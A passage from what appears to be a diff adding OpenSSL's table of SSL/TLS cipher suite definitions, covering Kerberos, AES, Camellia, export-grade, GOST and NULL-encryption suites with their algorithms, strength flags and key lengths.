+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     40,
+     128,
+     },
+
+/* Cipher 1A */
+    {
+     1,
+     SSL3_TXT_ADH_DES_64_CBC_SHA,
+     SSL3_CK_ADH_DES_64_CBC_SHA,
+     SSL_kEDH,
+     SSL_aNULL,
+     SSL_DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_LOW,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     56,
+     56,
+     },
+
+/* Cipher 1B */
+    {
+     1,
+     SSL3_TXT_ADH_DES_192_CBC_SHA,
+     SSL3_CK_ADH_DES_192_CBC_SHA,
+     SSL_kEDH,
+     SSL_aNULL,
+     SSL_3DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+/* Fortezza ciphersuite from SSL 3.0 spec */
+#if 0
+/* Cipher 1C */
+    {
+     0,
+     SSL3_TXT_FZA_DMS_NULL_SHA,
+     SSL3_CK_FZA_DMS_NULL_SHA,
+     SSL_kFZA,
+     SSL_aFZA,
+     SSL_eNULL,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_STRONG_NONE,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     0,
+     0,
+     },
+
+/* Cipher 1D */
+    {
+     0,
+     SSL3_TXT_FZA_DMS_FZA_SHA,
+     SSL3_CK_FZA_DMS_FZA_SHA,
+     SSL_kFZA,
+     SSL_aFZA,
+     SSL_eFZA,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_STRONG_NONE,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     0,
+     0,
+     },
+
+/* Cipher 1E */
+    {
+     0,
+     SSL3_TXT_FZA_DMS_RC4_SHA,
+     SSL3_CK_FZA_DMS_RC4_SHA,
+     SSL_kFZA,
+     SSL_aFZA,
+     SSL_RC4,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+#endif
+
+#ifndef OPENSSL_NO_KRB5
+/* The Kerberos ciphers*/
+/* Cipher 1E */
+    {
+     1,
+     SSL3_TXT_KRB5_DES_64_CBC_SHA,
+     SSL3_CK_KRB5_DES_64_CBC_SHA,
+     SSL_kKRB5,
+     SSL_aKRB5,
+     SSL_DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_LOW,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     56,
+     56,
+     },
+
+/* Cipher 1F */
+    {
+     1,
+     SSL3_TXT_KRB5_DES_192_CBC3_SHA,
+     SSL3_CK_KRB5_DES_192_CBC3_SHA,
+     SSL_kKRB5,
+     SSL_aKRB5,
+     SSL_3DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+/* Cipher 20 */
+    {
+     1,
+     SSL3_TXT_KRB5_RC4_128_SHA,
+     SSL3_CK_KRB5_RC4_128_SHA,
+     SSL_kKRB5,
+     SSL_aKRB5,
+     SSL_RC4,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+/* Cipher 21 */
+    {
+     1,
+     SSL3_TXT_KRB5_IDEA_128_CBC_SHA,
+     SSL3_CK_KRB5_IDEA_128_CBC_SHA,
+     SSL_kKRB5,
+     SSL_aKRB5,
+     SSL_IDEA,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+/* Cipher 22 */
+    {
+     1,
+     SSL3_TXT_KRB5_DES_64_CBC_MD5,
+     SSL3_CK_KRB5_DES_64_CBC_MD5,
+     SSL_kKRB5,
+     SSL_aKRB5,
+     SSL_DES,
+     SSL_MD5,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_LOW,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     56,
+     56,
+     },
+
+/* Cipher 23 */
+    {
+     1,
+     SSL3_TXT_KRB5_DES_192_CBC3_MD5,
+     SSL3_CK_KRB5_DES_192_CBC3_MD5,
+     SSL_kKRB5,
+     SSL_aKRB5,
+     SSL_3DES,
+     SSL_MD5,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+/* Cipher 24 */
+    {
+     1,
+     SSL3_TXT_KRB5_RC4_128_MD5,
+     SSL3_CK_KRB5_RC4_128_MD5,
+     SSL_kKRB5,
+     SSL_aKRB5,
+     SSL_RC4,
+     SSL_MD5,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+/* Cipher 25 */
+    {
+     1,
+     SSL3_TXT_KRB5_IDEA_128_CBC_MD5,
+     SSL3_CK_KRB5_IDEA_128_CBC_MD5,
+     SSL_kKRB5,
+     SSL_aKRB5,
+     SSL_IDEA,
+     SSL_MD5,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+/* Cipher 26 */
+    {
+     1,
+     SSL3_TXT_KRB5_DES_40_CBC_SHA,
+     SSL3_CK_KRB5_DES_40_CBC_SHA,
+     SSL_kKRB5,
+     SSL_aKRB5,
+     SSL_DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_EXPORT | SSL_EXP40,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     40,
+     56,
+     },
+
+/* Cipher 27 */
+    {
+     1,
+     SSL3_TXT_KRB5_RC2_40_CBC_SHA,
+     SSL3_CK_KRB5_RC2_40_CBC_SHA,
+     SSL_kKRB5,
+     SSL_aKRB5,
+     SSL_RC2,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_EXPORT | SSL_EXP40,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     40,
+     128,
+     },
+
+/* Cipher 28 */
+    {
+     1,
+     SSL3_TXT_KRB5_RC4_40_SHA,
+     SSL3_CK_KRB5_RC4_40_SHA,
+     SSL_kKRB5,
+     SSL_aKRB5,
+     SSL_RC4,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_EXPORT | SSL_EXP40,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     40,
+     128,
+     },
+
+/* Cipher 29 */
+    {
+     1,
+     SSL3_TXT_KRB5_DES_40_CBC_MD5,
+     SSL3_CK_KRB5_DES_40_CBC_MD5,
+     SSL_kKRB5,
+     SSL_aKRB5,
+     SSL_DES,
+     SSL_MD5,
+     SSL_SSLV3,
+     SSL_EXPORT | SSL_EXP40,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     40,
+     56,
+     },
+
+/* Cipher 2A */
+    {
+     1,
+     SSL3_TXT_KRB5_RC2_40_CBC_MD5,
+     SSL3_CK_KRB5_RC2_40_CBC_MD5,
+     SSL_kKRB5,
+     SSL_aKRB5,
+     SSL_RC2,
+     SSL_MD5,
+     SSL_SSLV3,
+     SSL_EXPORT | SSL_EXP40,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     40,
+     128,
+     },
+
+/* Cipher 2B */
+    {
+     1,
+     SSL3_TXT_KRB5_RC4_40_MD5,
+     SSL3_CK_KRB5_RC4_40_MD5,
+     SSL_kKRB5,
+     SSL_aKRB5,
+     SSL_RC4,
+     SSL_MD5,
+     SSL_SSLV3,
+     SSL_EXPORT | SSL_EXP40,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     40,
+     128,
+     },
+#endif                          /* OPENSSL_NO_KRB5 */
+
+/* New AES ciphersuites */
+/* Cipher 2F */
+    {
+     1,
+     TLS1_TXT_RSA_WITH_AES_128_SHA,
+     TLS1_CK_RSA_WITH_AES_128_SHA,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_AES128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+/* Cipher 30 */
+    {
+     1,
+     TLS1_TXT_DH_DSS_WITH_AES_128_SHA,
+     TLS1_CK_DH_DSS_WITH_AES_128_SHA,
+     SSL_kDHd,
+     SSL_aDH,
+     SSL_AES128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+/* Cipher 31 */
+    {
+     1,
+     TLS1_TXT_DH_RSA_WITH_AES_128_SHA,
+     TLS1_CK_DH_RSA_WITH_AES_128_SHA,
+     SSL_kDHr,
+     SSL_aDH,
+     SSL_AES128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+/* Cipher 32 */
+    {
+     1,
+     TLS1_TXT_DHE_DSS_WITH_AES_128_SHA,
+     TLS1_CK_DHE_DSS_WITH_AES_128_SHA,
+     SSL_kEDH,
+     SSL_aDSS,
+     SSL_AES128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+/* Cipher 33 */
+    {
+     1,
+     TLS1_TXT_DHE_RSA_WITH_AES_128_SHA,
+     TLS1_CK_DHE_RSA_WITH_AES_128_SHA,
+     SSL_kEDH,
+     SSL_aRSA,
+     SSL_AES128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+/* Cipher 34 */
+    {
+     1,
+     TLS1_TXT_ADH_WITH_AES_128_SHA,
+     TLS1_CK_ADH_WITH_AES_128_SHA,
+     SSL_kEDH,
+     SSL_aNULL,
+     SSL_AES128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+/* Cipher 35 */
+    {
+     1,
+     TLS1_TXT_RSA_WITH_AES_256_SHA,
+     TLS1_CK_RSA_WITH_AES_256_SHA,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_AES256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+/* Cipher 36 */
+    {
+     1,
+     TLS1_TXT_DH_DSS_WITH_AES_256_SHA,
+     TLS1_CK_DH_DSS_WITH_AES_256_SHA,
+     SSL_kDHd,
+     SSL_aDH,
+     SSL_AES256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+/* Cipher 37 */
+    {
+     1,
+     TLS1_TXT_DH_RSA_WITH_AES_256_SHA,
+     TLS1_CK_DH_RSA_WITH_AES_256_SHA,
+     SSL_kDHr,
+     SSL_aDH,
+     SSL_AES256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+/* Cipher 38 */
+    {
+     1,
+     TLS1_TXT_DHE_DSS_WITH_AES_256_SHA,
+     TLS1_CK_DHE_DSS_WITH_AES_256_SHA,
+     SSL_kEDH,
+     SSL_aDSS,
+     SSL_AES256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+/* Cipher 39 */
+    {
+     1,
+     TLS1_TXT_DHE_RSA_WITH_AES_256_SHA,
+     TLS1_CK_DHE_RSA_WITH_AES_256_SHA,
+     SSL_kEDH,
+     SSL_aRSA,
+     SSL_AES256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* Cipher 3A */
+    {
+     1,
+     TLS1_TXT_ADH_WITH_AES_256_SHA,
+     TLS1_CK_ADH_WITH_AES_256_SHA,
+     SSL_kEDH,
+     SSL_aNULL,
+     SSL_AES256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* TLS v1.2 ciphersuites */
+    /* Cipher 3B */
+    {
+     1,
+     TLS1_TXT_RSA_WITH_NULL_SHA256,
+     TLS1_CK_RSA_WITH_NULL_SHA256,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_eNULL,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_STRONG_NONE | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     0,
+     0,
+     },
+
+    /* Cipher 3C */
+    {
+     1,
+     TLS1_TXT_RSA_WITH_AES_128_SHA256,
+     TLS1_CK_RSA_WITH_AES_128_SHA256,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_AES128,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 3D */
+    {
+     1,
+     TLS1_TXT_RSA_WITH_AES_256_SHA256,
+     TLS1_CK_RSA_WITH_AES_256_SHA256,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_AES256,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* Cipher 3E */
+    {
+     1,
+     TLS1_TXT_DH_DSS_WITH_AES_128_SHA256,
+     TLS1_CK_DH_DSS_WITH_AES_128_SHA256,
+     SSL_kDHd,
+     SSL_aDH,
+     SSL_AES128,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 3F */
+    {
+     1,
+     TLS1_TXT_DH_RSA_WITH_AES_128_SHA256,
+     TLS1_CK_DH_RSA_WITH_AES_128_SHA256,
+     SSL_kDHr,
+     SSL_aDH,
+     SSL_AES128,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 40 */
+    {
+     1,
+     TLS1_TXT_DHE_DSS_WITH_AES_128_SHA256,
+     TLS1_CK_DHE_DSS_WITH_AES_128_SHA256,
+     SSL_kEDH,
+     SSL_aDSS,
+     SSL_AES128,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+#ifndef OPENSSL_NO_CAMELLIA
+    /* Camellia ciphersuites from RFC4132 (128-bit portion) */
+
+    /* Cipher 41 */
+    {
+     1,
+     TLS1_TXT_RSA_WITH_CAMELLIA_128_CBC_SHA,
+     TLS1_CK_RSA_WITH_CAMELLIA_128_CBC_SHA,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_CAMELLIA128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 42 */
+    {
+     1,
+     TLS1_TXT_DH_DSS_WITH_CAMELLIA_128_CBC_SHA,
+     TLS1_CK_DH_DSS_WITH_CAMELLIA_128_CBC_SHA,
+     SSL_kDHd,
+     SSL_aDH,
+     SSL_CAMELLIA128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 43 */
+    {
+     1,
+     TLS1_TXT_DH_RSA_WITH_CAMELLIA_128_CBC_SHA,
+     TLS1_CK_DH_RSA_WITH_CAMELLIA_128_CBC_SHA,
+     SSL_kDHr,
+     SSL_aDH,
+     SSL_CAMELLIA128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 44 */
+    {
+     1,
+     TLS1_TXT_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA,
+     TLS1_CK_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA,
+     SSL_kEDH,
+     SSL_aDSS,
+     SSL_CAMELLIA128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 45 */
+    {
+     1,
+     TLS1_TXT_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA,
+     TLS1_CK_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA,
+     SSL_kEDH,
+     SSL_aRSA,
+     SSL_CAMELLIA128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 46 */
+    {
+     1,
+     TLS1_TXT_ADH_WITH_CAMELLIA_128_CBC_SHA,
+     TLS1_CK_ADH_WITH_CAMELLIA_128_CBC_SHA,
+     SSL_kEDH,
+     SSL_aNULL,
+     SSL_CAMELLIA128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+#endif                          /* OPENSSL_NO_CAMELLIA */
+
+#if TLS1_ALLOW_EXPERIMENTAL_CIPHERSUITES
+    /* New TLS Export CipherSuites from expired ID */
+# if 0
+    /* Cipher 60 */
+    {
+     1,
+     TLS1_TXT_RSA_EXPORT1024_WITH_RC4_56_MD5,
+     TLS1_CK_RSA_EXPORT1024_WITH_RC4_56_MD5,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_RC4,
+     SSL_MD5,
+     SSL_TLSV1,
+     SSL_EXPORT | SSL_EXP56,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     56,
+     128,
+     },
+
+    /* Cipher 61 */
+    {
+     1,
+     TLS1_TXT_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5,
+     TLS1_CK_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_RC2,
+     SSL_MD5,
+     SSL_TLSV1,
+     SSL_EXPORT | SSL_EXP56,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     56,
+     128,
+     },
+# endif
+
+    /* Cipher 62 */
+    {
+     1,
+     TLS1_TXT_RSA_EXPORT1024_WITH_DES_CBC_SHA,
+     TLS1_CK_RSA_EXPORT1024_WITH_DES_CBC_SHA,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_DES,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_EXPORT | SSL_EXP56,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     56,
+     56,
+     },
+
+    /* Cipher 63 */
+    {
+     1,
+     TLS1_TXT_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA,
+     TLS1_CK_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA,
+     SSL_kEDH,
+     SSL_aDSS,
+     SSL_DES,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_EXPORT | SSL_EXP56,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     56,
+     56,
+     },
+
+    /* Cipher 64 */
+    {
+     1,
+     TLS1_TXT_RSA_EXPORT1024_WITH_RC4_56_SHA,
+     TLS1_CK_RSA_EXPORT1024_WITH_RC4_56_SHA,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_RC4,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_EXPORT | SSL_EXP56,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     56,
+     128,
+     },
+
+    /* Cipher 65 */
+    {
+     1,
+     TLS1_TXT_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA,
+     TLS1_CK_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA,
+     SSL_kEDH,
+     SSL_aDSS,
+     SSL_RC4,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_EXPORT | SSL_EXP56,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     56,
+     128,
+     },
+
+    /* Cipher 66 */
+    {
+     1,
+     TLS1_TXT_DHE_DSS_WITH_RC4_128_SHA,
+     TLS1_CK_DHE_DSS_WITH_RC4_128_SHA,
+     SSL_kEDH,
+     SSL_aDSS,
+     SSL_RC4,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+#endif
+
+    /* TLS v1.2 ciphersuites */
+    /* Cipher 67 */
+    {
+     1,
+     TLS1_TXT_DHE_RSA_WITH_AES_128_SHA256,
+     TLS1_CK_DHE_RSA_WITH_AES_128_SHA256,
+     SSL_kEDH,
+     SSL_aRSA,
+     SSL_AES128,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 68 */
+    {
+     1,
+     TLS1_TXT_DH_DSS_WITH_AES_256_SHA256,
+     TLS1_CK_DH_DSS_WITH_AES_256_SHA256,
+     SSL_kDHd,
+     SSL_aDH,
+     SSL_AES256,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* Cipher 69 */
+    {
+     1,
+     TLS1_TXT_DH_RSA_WITH_AES_256_SHA256,
+     TLS1_CK_DH_RSA_WITH_AES_256_SHA256,
+     SSL_kDHr,
+     SSL_aDH,
+     SSL_AES256,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* Cipher 6A */
+    {
+     1,
+     TLS1_TXT_DHE_DSS_WITH_AES_256_SHA256,
+     TLS1_CK_DHE_DSS_WITH_AES_256_SHA256,
+     SSL_kEDH,
+     SSL_aDSS,
+     SSL_AES256,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* Cipher 6B */
+    {
+     1,
+     TLS1_TXT_DHE_RSA_WITH_AES_256_SHA256,
+     TLS1_CK_DHE_RSA_WITH_AES_256_SHA256,
+     SSL_kEDH,
+     SSL_aRSA,
+     SSL_AES256,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* Cipher 6C */
+    {
+     1,
+     TLS1_TXT_ADH_WITH_AES_128_SHA256,
+     TLS1_CK_ADH_WITH_AES_128_SHA256,
+     SSL_kEDH,
+     SSL_aNULL,
+     SSL_AES128,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 6D */
+    {
+     1,
+     TLS1_TXT_ADH_WITH_AES_256_SHA256,
+     TLS1_CK_ADH_WITH_AES_256_SHA256,
+     SSL_kEDH,
+     SSL_aNULL,
+     SSL_AES256,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* GOST Ciphersuites */
+
+    {
+     1,
+     "GOST94-GOST89-GOST89",
+     0x3000080,
+     SSL_kGOST,
+     SSL_aGOST94,
+     SSL_eGOST2814789CNT,
+     SSL_GOST89MAC,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_GOST94 | TLS1_PRF_GOST94 | TLS1_STREAM_MAC,
+     256,
+     256},
+    {
+     1,
+     "GOST2001-GOST89-GOST89",
+     0x3000081,
+     SSL_kGOST,
+     SSL_aGOST01,
+     SSL_eGOST2814789CNT,
+     SSL_GOST89MAC,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_GOST94 | TLS1_PRF_GOST94 | TLS1_STREAM_MAC,
+     256,
+     256},
+    {
+     1,
+     "GOST94-NULL-GOST94",
+     0x3000082,
+     SSL_kGOST,
+     SSL_aGOST94,
+     SSL_eNULL,
+     SSL_GOST94,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_STRONG_NONE,
+     SSL_HANDSHAKE_MAC_GOST94 | TLS1_PRF_GOST94,
+     0,
+     0},
+    {
+     1,
+     "GOST2001-NULL-GOST94",
+     0x3000083,
+     SSL_kGOST,
+     SSL_aGOST01,
+     SSL_eNULL,
+     SSL_GOST94,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_STRONG_NONE,
+     SSL_HANDSHAKE_MAC_GOST94 | TLS1_PRF_GOST94,
+     0,
+     0},
+
+#ifndef OPENSSL_NO_CAMELLIA
+    /* Camellia ciphersuites from RFC4132 (256-bit portion) */
+
+    /* Cipher 84 */
+    {
+     1,
+     TLS1_TXT_RSA_WITH_CAMELLIA_256_CBC_SHA,
+     TLS1_CK_RSA_WITH_CAMELLIA_256_CBC_SHA,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_CAMELLIA256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+    /* Cipher 85 */
+    {
+     1,
+     TLS1_TXT_DH_DSS_WITH_CAMELLIA_256_CBC_SHA,
+     TLS1_CK_DH_DSS_WITH_CAMELLIA_256_CBC_SHA,
+     SSL_kDHd,
+     SSL_aDH,
+     SSL_CAMELLIA256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* Cipher 86 */
+    {
+     1,
+     TLS1_TXT_DH_RSA_WITH_CAMELLIA_256_CBC_SHA,
+     TLS1_CK_DH_RSA_WITH_CAMELLIA_256_CBC_SHA,
+     SSL_kDHr,
+     SSL_aDH,
+     SSL_CAMELLIA256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* Cipher 87 */
+    {
+     1,
+     TLS1_TXT_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA,
+     TLS1_CK_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA,
+     SSL_kEDH,
+     SSL_aDSS,
